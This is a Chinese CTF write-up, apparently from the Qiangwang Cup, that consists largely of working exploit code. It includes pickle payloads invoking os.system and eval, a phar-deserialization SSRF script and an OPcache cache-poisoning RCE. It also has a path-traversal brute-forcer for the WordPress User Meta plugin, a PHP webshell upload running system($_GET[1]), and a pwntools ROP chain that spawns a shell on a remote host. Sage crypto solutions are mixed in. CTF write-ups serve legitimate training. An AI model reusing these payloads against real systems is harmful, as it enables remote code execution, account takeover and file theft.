payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\xe9\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x61\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x08\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x24\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x23\x00\x00\x00'+cmd+b'ios\nsystem\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(ctime\nsleep\nI70\no.')
payload_byte = (b'\x80\x03capp\nadmin\n}(ctime\nsleep\nI70\no.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x09\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x0a\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload_byte = (b'\x80\x03c__main__\nadmin\n}(X\x3e\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload_byte = (b'\x80\x03capp\nadmin\n}(X\x73\x00\x00\x00'+cmd+b'ibuiltins\neval\n.')
payload = pickletools.optimize(payload_byte)
print(str(base64.b64encode(payload), encoding='utf-8'))
GET /shell123?cmd=sleep+50 HTTP/1.1
Host: 123.56.86.227:39489
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


babyweb

修改admin的密码为123456 ,hint给了源码,python和go处理json的方式不同造成逻辑漏洞

<script>
        var ws = null;
        var url = "ws://127.0.0.1:8888/bot";
        function sendtobot() {
            if (ws) {
                var msg = document.getElementById("sendbox").value;
                ws.send(msg);
                document.getElementById("sendbox").value = "";
                document.getElementById("chatbox").append("你: " + msg + "\r\n");
            }
            else{
                ws = new WebSocket(url);
                ws.onopen = function (event) {
                    console.log('connection open!')
                    open("./connection open!")
                    var msg = "changepw 123456";
                    ws.send(msg);
                    document.getElementById("sendbox").value = "";
                    document.getElementById("chatbox").append("你: " + msg + "\r\n");
                }
                ws.onmessage = function (ev) {
                    botsay(ev.data);
                };
                ws.onerror = function () {
                    console.log("connection error");
                };
                ws.onclose = function () {
                    console.log("connection close!");
                };

            }
        }
        function closeWebSocket() {
            if(ws){
                ws.close();
                ws = null;
            }
        }
        function botsay(content) {
            document.getElementById("chatbox").append("bot: " + content + "\r\n");
        }
        sendtobot()
    </script>

post发包刷钱买flag

{"product":[{"id":1, "num" :0}, {"id":2, "num" :0}, {"id":1,
" num" :-11000}], " product":[{"id":1, "num":0}, {"id":2, "num"
:0}]}

easyweb

绕session上传 phar反序列化 curl ssrf 打内网
flag在 10.10.10.10:80 上
exp.py

from hashlib import sha1
import os
import requests
import base64
import time
phpcode = ""
with open("classser.php","r") as f:
    phpcode = f.read()
def fuzz(payload):
    print(payload)
    phpcodefuzz = phpcode.replace("{{code}}",payload)
    r = requests.get("http://47.104.95.124:8080/")
    with open("tmp.php","w") as f:
        f.write(phpcodefuzz)
    text = os.popen("php tmp.php").read()
    time.sleep(1)
    f = open("phar.phar", "rb")
    dataa = f.read()
    f.close()
    file = dataa.replace(b'"AdminShow":4',b'"AdminShow":5')
    text = file[:-28]  #读取开始到末尾除签名外内容
    last = file[-8:]   #读取最后8位的GBMB和签名flag
    new_file = text+sha1(text).digest() + last  #生成新的文件内容,主要是此时Sha1正确了。
    urll = "http://47.104.95.124:8080/upload.php"
    burp_proxy = {
        "http":"http://127.0.0.1:8080"
    }
    cooo = {
        "PHPSESSID":"a"
    }
    filee = {'file': ('newwwa.jpg', new_file, 'image/png')}
    dataa = {
        "PHP_SESSION_UPLOAD_PROGRESS":"123"
    }
    r = requests.post(url=urll,data=dataa,files=filee,cookies=cooo)
    filename = r.text[r.text.index("./")+2:r.text.index(" suc")]
    file_unse = f"http://47.104.95.124:8080/showfile.php?f=phar://{filename}/demo"
    r = requests.get(url=file_unse)
    # print(r.text)
    base = r.text[r.text.index("<img src=data:jpg;base64,")+len('<img src=data:jpg;base64,'):r.text.index(" /><img src=data:jpg;base64, />")]
    print(base64.b64decode(base).decode())
    with open("asd.html",'w+') as f:
        f.write(base64.b64decode(base).decode())
if 2 == 1 :
    fuzz("file:///var/log/apache/access.log")
else:
    fuzz("http://10.10.10.10:80/?url=file:///flag")

反序列化classser.php

<?php
ini_set('phar.readonly',0);
class GuestShow{
    public $file;
    public $contents;
    public function __construct($file)
    {

        $this->file=new AdminShow($file);
    }
    function __toString(){
        $str = $this->file->name;
        return "";
    }
    function __get($value){
        return $this->$value;
    }
    function show()
    {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64,".base64_encode($this->contents);
        echo "<img src={$src} />";
    }
    function __destruct(){
        echo $this;
    }
}


class AdminShow{
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
        $this->source = '';
        $this->schema = $file;
    }
    public function __toString()
    {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }
    public function __get($value){
        $this->show();
        return $this->$value;
    }
    public function __set($key,$value){
        $this->$key = $value;
    }
    public function show(){
        if(preg_match('/usr|auto|log/i' , $this->source))
        {
            die("error");
        }
        $url = $this->schema . $this->source;
    }
    public function __wakeup()
    {
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$o = new GuestShow("{{code}}");
echo serialize($o);
$phar->setMetadata($o);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

uploadpro

/phpinfo.php
开了OPcache拓展
可以上传bin…
http://eci.ichunqiu.com/uploads../
目录穿越读文件读一下源码可以跨目录上传
先读index.php.bin获取时间戳
然后自己构造phpinfo.php.bin上传来rce 010 改时间戳
可以重放容器
内存缓存,上传前先不要访问phpinfo.php
docker起一个php:7.4.3-apache
改改配置和题目相同

docker run -itd -p 11015:80 -v ./ss:/var/www/html php:7.4.3-apache
opcache.consistency_checks=0
opcache.dups_fix=Off
opcache.enable=On
opcache.enable_cli=On
opcache.enable_file_override=Off
opcache.file_cache=/tmp/opcache
opcache.file_cache_consistency_checks=1
opcache.file_cache_only=0
opcache.file_update_protection=2
opcache.force_restart_timeout=180
opcache.huge_code_pages=Off
opcache.interned_strings_buffer=8
opcache.lockfile_path=/tmp
opcache.log_verbosity_level=1
opcache.max_accelerated_files=10000
opcache.max_file_size=0
opcache.max_wasted_percentage=5
opcache.memory_consumption=128
opcache.opt_debug_level=0
opcache.optimization_level=0x7FFEBFFF
opcache.protect_memory=0
opcache.revalidate_freq=2
opcache.revalidate_path=Off
opcache.save_comments=1
opcache.use_cwd=On
opcache.validate_permission=Off
opcache.validate_root=Off
opcache.validate_timestamps=On

exp.py

#!/usr/bin/python3
import requests
import os

urll = "http://url/"
datad = None
with open('/home/ubuntu/test/ss/phpinfo.php.bin', 'rb') as f:
    datad = f.read()
filess = {'file': ('phpinfo.php.bin', datad, 'image/png')}
r = requests.post(url=urll+"index.php?prefix=../../../../../../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/",files=filess)
# print(r.text)
# print(r.content)
r = requests.get(url=urll+"uploads../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/phpinfo.php.bin")
print(r.content==datad)
# print(urll+"uploads../tmp/opcache/a06090313e406ccd069625aabb3cded7/var/www/html/index.php.bin")
# print(r.content)

强网先锋

WP-UM

根据题目来的话就是User Meta这个插件了
User Meta:2.4.3
https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1cd
pf-nonce 去 http://eci-2zea7reemywzfen5krqa.cloudeci1.ichunqiu.com/index.php/login/ 页面f12刷一个pf_nonce

import requests
import string

burp0_url = "http://url:80/wp-admin/admin-ajax.php"
burp0_cookies = {
    "Hm_lvt_2d0601bd28de7d49818249cf35d95943": "1653791821,1655028229,1655379686,1655471106"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded"}
print(string.ascii_letters)
res = "MaoGePaMao"
res = "MaoGeYaoQiFeiLa"
for i in range(15,16):
    for j in string.ascii_letters:
        # filename = "username/"+str(i)+j
        filename = "password/"+str(i)+j
        print(filename)
        burp0_data = {"field_name": "test", "filepath": 
        "/../../../../../../../../"+filename, 
        "field_id": "um_field_4",
                    "form_key": "Upload", "action": "um_show_uploaded_file", "pf_nonce": "39a16c8deb", "is_ajax": "true"}
        r = requests.post(burp0_url, headers=burp0_headers,
                    cookies=burp0_cookies, data=burp0_data)
        if "um_remove_file" in r.text:
            res += j
            print(res)
            break

爆密码 登上后台写马
cat /usr/local/This_1s_secert

rcefile

spl_autoload_register
文件和inc类同名

import requests
import time
import hashlib
import re
proxies = {"http":"http://127.0.0.1:8080"}
for i in range(1):
    # print(time.time())
    timeee = str(int(time.time()))
    # print(int(time.time()))
    # print(timeee)
    # print(timeee.encode())
    h = hashlib.md5()
    h.update(timeee.encode())
    md5name = h.hexdigest()
    print(md5name)


    burp0_url = "http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php"
    burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
                    "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx6dML4ocEqShnX50"}
    burp0_data = "------WebKitFormBoundaryx6dML4ocEqShnX50\r\nContent-Disposition: form-data; name=\"file\"; filename=\"popko3.inc\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\nclass " + \
        md5name + \
        "{\r\n\tfunction __wakeup()\r\n    {\r\n           system($_GET[1]);\r\n    }\r\n}\r\n------WebKitFormBoundaryx6dML4ocEqShnX50--\r\n"
    r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    results = re.search(r"file: (.*)\.inc", r.text)
    # print()
    # print(r.text)
    print(results.group(1))
    print(md5name == results.group(1))
GET /showfile.php?1=cat+/flag HTTP/1.1
Host: eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2zefnon2z47gzey5f58s.cloudeci1.ichunqiu.com/upload.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1653791821,1655028229,1655379686,1655471106; userfile=O:32:"cdf056f0b857b3651ce22a891cfa7599":0:{}
Connection: close

polydiv

sage: P.<x> = GF(2)[]
sage: r = x^14 + x^12 + x^10 + x^8 + x^6 + x^5 + x^4 + x^2 + 1
....: a = x^7 + x^6 + x^3 + x + 1
....: c = x^6 + x^2
sage: (r-c)/a
x^7 + x^6 + x^2 + x + 1

ASR

分解n,有限域开根,中国剩余定理

sage: p1 = 218566259296037866647273372633238739089
sage: p2 = 260594583349478633632570848336184053653
sage: p3 = 225933944608558304529179430753170813347
sage: p4 = 223213222467584072959434495118689164399
sage: n == (p1*p2*p3*p4)^2
True
sage: P.<m> = PolynomialRing(Zmod(p1),implementation='NTL')
....: f = m^e-c
....: roots1 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p2),implementation='NTL')
....: f = m^e-c
....: roots2 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p3),implementation='NTL')
....: f = m^e-c
....: roots3 = [r[0] for r in f.monic().roots()]
....: P.<m> = PolynomialRing(Zmod(p4),implementation='NTL')
....: f = m^e-c
....: roots4 = [r[0] for r in f.monic().roots()]
sage: for r1 in roots1:
....:     for r2 in roots2:
....:         for r3 in roots3:
....:             for r4 in roots4:
....:                 res = long_to_bytes(crt([ZZ(r1), ZZ(r2), ZZ(r3), ZZ(r4)], [p1, p2, p3, p4]))
....:                 if b'flag{' in res:
....:                     print(res)
....:
b'flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free}\x06\x06\x06\x06\x06\x06'

devnull

栈迁移, 最后的输出‘Thanks\x0a’刚刚好能让rdx变为7,所以利用mprotect的gadget来使得程序的段变得可读可写执行,最后执行shellcode

“`python=

from pwn import *

context.arch = 'amd64'

<h1>p = process("./devnull")</h1>

p = remote("59.110.212.61",26182)

context.terminal = ['tmux', 'splitw', '-h']

<h1>gdb.attach(p,"b *0x401436")</h1>

p.recvuntil("please input your filename\n")
p.sendline("A"*0x1f)

fake_buf = 0x3fe000
leave_ret = 0x0401511

<h1>0x0000000000401350: mov rax, qword ptr [rbp – 0x18]; leave; ret;</h1>

mov_rax_leave_ret = 0x0000000000401350

p.recvuntil("Please write the data you want to discard\n")
p.send(b"A"*0x14+p64(fake_buf)+p64(fake_buf)+p64(leave_ret))

p.recvuntil("please input your new data\n")

rop_chain = p64(fake_buf+0x10+0x18) + p64(mov_rax_leave_ret)
rop_chain += p64(fake_buf)
rop_chain += p64(0xcafe)*2
rop_chain += p64(fake_buf+0x100) + p64(0x4012D0)

rop_chain += p64(fake_buf+0x48)*2

<h1>>>> asm('mov rsi,rdi;xor rdi,rdi;mov rdx,r11;syscall').encode('hex')</h1>

<h1>'4889fe4831ff4c89da0f05'</h1>

rop_chain += b''.fromhex('4889fe4831ff4c89da0f05')

p.send(rop_chain)

p.recvuntil('Thanks')

p.send(b'\x90'*0x70+asm(shellcraft.sh()))

p.interactive()

“`

拿到shell后,还要exec >&2,这样就可以用错误流输出了

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注